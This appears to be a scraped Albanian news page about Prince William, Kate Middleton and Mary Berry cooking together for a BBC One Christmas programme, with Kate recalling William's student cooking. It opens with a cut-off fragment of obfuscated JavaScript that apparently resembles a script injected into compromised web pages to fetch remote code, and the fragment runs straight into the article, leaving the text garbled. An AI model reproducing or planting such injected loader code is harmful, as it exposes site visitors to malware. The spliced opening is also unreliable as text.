;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

William paska impresionuar Kate me detajin që nuk do iu shkonte aspak në mend

By

Princi William është bashkuar me gruan e tij Kate Middleton dhe Mary Berry në një shfaqje gatimi për Krishtlindje.

Programi, i cili do të jetë premierë në BBC One më 16 dhjetor, do të shfaqë treshen duke gatuar për festë dhe do të vizitojnë një numër të qendrave të bamirësisë, njofton Klan Kosova.

Por më parë Princi William kishte tentuar që ta impresionojë Kate Middleton në universitet me aftësinë e tij për të gatuar.

Ata thanë se të fitosh zemrën e një personi është përmes stomakut dhe duket se kështu filloi saktësisht Princ William ia fitoi zemrën gruas së tij, Kate, në ditët e hershme të lidhjes së tyre.

Gjatë programit televiziv me Berry, Dukesha e Cambridge u pyet se a kishte gatuar ndonjëherë William për të dhe përgjigja e saj ishte: “Ai ishte shumë i mirë në përgatitjen e mëngjesit. Në ditët universitare ai u përpoq që të bënte të gjitha shujtat. Mendoj që atëherë ishte duke tentuar të më impresionojë mua me gjëra sikur salcë boloneze apo të tilla”.

Artikuj të ngjashëm